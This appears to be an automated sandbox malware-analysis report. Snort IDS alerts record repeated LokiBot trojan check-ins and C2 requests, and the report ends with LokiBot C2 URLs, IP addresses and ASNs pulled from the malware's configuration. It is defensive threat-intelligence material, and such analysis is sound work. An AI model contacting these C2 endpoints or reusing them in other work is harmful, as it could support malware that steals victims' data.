              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49195 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49195 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49196 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49196 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49196 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49196 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49197 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49197 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49197 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49197 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49198 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49198 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49198 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49198 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49199 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49199 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49199 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49199 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49200 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49200 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49200 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49200 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49201 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49201 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49201 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49201 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49202 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49202 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49202 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49202 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49203 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49203 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49203 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49203 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49204 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49204 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49204 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49204 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49205 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49205 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49205 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49205 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49206 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49206 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49206 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49206 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49207 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49207 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49207 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49207 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49208 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49208 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49208 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49208 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49209 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49209 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49209 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49209 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49210 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49210 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49210 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49210 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49211 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49211 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49211 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49211 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49212 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49212 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49212 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49212 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49213 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49213 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49213 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49213 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49214 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49214 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49214 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49214 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49215 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49215 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49215 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49215 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49216 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49216 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49216 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49216 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49217 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49217 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49217 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49217 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49218 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49218 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49218 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49218 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49219 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49219 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49219 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49219 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49220 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49220 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49220 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49220 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49221 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49221 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49221 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49221 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49222 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49222 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49222 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49222 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49223 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49223 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49223 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49223 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49224 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49224 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49224 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49224 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49225 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49225 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49225 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49225 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49226 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49226 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49226 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49226 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49227 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49227 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49227 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49227 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49228 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49228 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49228 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49228 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49229 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49229 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49229 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49229 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49230 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49230 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49230 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49230 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49231 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49231 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49231 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49231 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49232 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49232 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49232 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49232 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49234 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49234 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49234 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49234 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49235 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49235 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49235 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49235 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49236 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49236 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49236 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49236 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49237 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49237 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49237 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49237 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49238 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49238 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49238 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49238 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49239 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49239 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49239 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49239 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49240 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49240 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49240 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49240 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49241 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49241 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49241 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49241 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49242 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49242 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49242 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49242 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49243 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49243 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49243 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49243 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49244 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49244 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49244 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49244 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49245 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49245 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49245 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49245 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49246 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49246 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49246 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49246 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49247 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49247 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49247 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49247 -> 172.67.197.66:80
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
              Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
              Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
              Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
              Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewIP Address: 198.46.132.195 198.46.132.195
